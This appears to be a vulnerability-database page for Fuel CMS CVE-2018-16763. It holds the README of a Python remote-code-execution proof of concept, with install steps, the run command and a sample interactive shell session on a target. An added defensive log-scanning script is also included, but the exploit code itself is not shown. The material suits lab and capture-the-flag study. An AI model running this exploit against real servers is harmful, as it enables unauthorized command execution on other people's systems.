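Related vulnerability
Title:
FUEL CMS injection vulnerability
(CVE-2018-16763)
Description: FUEL CMS is a content management system (CMS) based on the CodeIgniter framework. In FUEL CMS 1.4.1, the 'filter' parameter of the pages/select/ page and the 'data' parameter of the preview/ page have an injection vulnerability. The vulnerability arises because, when user input is used to construct commands, data structures or records, the network system or product does not properly validate that input and fails to filter, or incorrectly filters, the special elements in it, causing the system or product to parse or interpret it incorrectly.
Description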
A Proof-of-Concept (PoC) exploit for CVE-2018-16763 (Fuel CMS - Preauthenticated Remote Code Execution).
Introduction
# CVE-2018-16763 Proof-of-Concept
A Proof-of-Concept (PoC) exploit for CVE-2018-16763 (Fuel CMS - Preauthenticated Remote Code Execution).
## Description
This Python 3 program serves as a PoC for the CVE-2018-16763 vulnerability in the Fuel CMS content management system. Specifically, the vulnerability allows for PHP Code Evaluation through the pages/select/filter parameter (implemented in this PoC), leading to Preauthenticated Remote Code Execution, a critical system vulnerability.
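For defenders, one way to look for requests that target the two parameters named above is to scan web-server access logs for special characters in them. This is an added example, not part of the PoC repository: the log lines are constructed, and the combined log format, the `/fuel/` path prefix and the special-character set are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint/parameter pairs named on this page for CVE-2018-16763.
WATCHED = (("/pages/select", "filter"), ("/preview", "data"))
# Assumed heuristic: characters a plain filter/data value should not need.
SPECIAL = re.compile(r"""['"`;$(){}\\]""")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses, paths and values are illustrative only.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /fuel/pages/select/?filter=x%27%28%29 HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /fuel/preview/?data=x%2527%253B HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?filter=x%27 HTTP/1.1" 200 100',
]


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so that %2527 is seen as a quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return (path, parameter, decoded value) for each watched parameter
    whose value contains special characters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    hits = []
    # parse_qsl percent-decodes once; fully_decode removes further layers.
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        for endpoint, param in WATCHED:
            if endpoint in url.path.lower() and name.lower() == param:
                value = fully_decode(raw)
                if SPECIAL.search(value):
                    hits.append((url.path, name, value))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for path, name, value in suspicious_params(line):
            print(f"ALERT {path} {name}={value!r}")
```

Parameters sent in a POST body do not appear in access logs, so the same check has to run where request bodies are visible, such as a WAF or application middleware.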
## Getting Started
### Dependencies
* Python 3 and the Python Standard Library
* The Open Source "git" Version Control System
* Other Python Packages/Modules (see requirements.txt for more details)
* CMD, PowerShell, Terminal, or some other Command Line Interface (CLI)
* A Windows, Linux, Unix, or macOS Operating System
### Installation
1. Download the git repository.
```
git clone https://gitlab.com/python-projects7372210/cve-2018-16763-proof-of-concept.git
```
2. Enter the git repository.
```
cd cve-2018-16763-proof-of-concept
```
3. Install the required packages and other dependencies.
```
python3 -m pip install -r requirements.txt
```
### Program Execution
Run the exploit script against a vulnerable target.
(ONLY RUN THE SCRIPT AGAINST A TARGET YOU OWN OR A TARGET PROVIDED BY TryHackMe, HackTheBox, OR ANOTHER ETHICAL HACKING WEBSITE!)
I would recommend checking out TryHackMe's "Ignite" Challenge for more details. You can also download the vulnerable Fuel CMS application from exploit-db.com.
```
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
```
## Help
* Are all of the dependencies present? If there are issues with conflicting dependencies, consider using a Python 3 virtual environment (https://docs.python.org/3/library/index.html).
* Is the target up?
* Is the target running Fuel CMS 1.4.1 or another version that is impacted by CVE-2018-16763?
```
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
```
## Authors
[formaljek14]
## Version History
* 0.1
    * Initial Release
## License
This project is licensed under the MIT License - see the LICENSE.md file for details.
## Acknowledgments
Heavily inspired by Exploit-DB programs, Vozec's PoC scripts, and the original PoC developed by Padsala Trushal.
* [Exploit-DB](https://www.exploit-db.com)
* [Vozec](https://github.com/Vozec)
* [Padsala Trushal](https://github.com/padsalatushal)
File snapshot
[4.0K] /data/pocs/f5f0d6d11e4889d1932dae72233bf79b49753bd4
├── [2.4K] CVE-2018-16763.py
├── [1.1K] LICENSE.md
├── [3.2K] README.md
└── [ 113] requirements.txt
0 directories, 4 files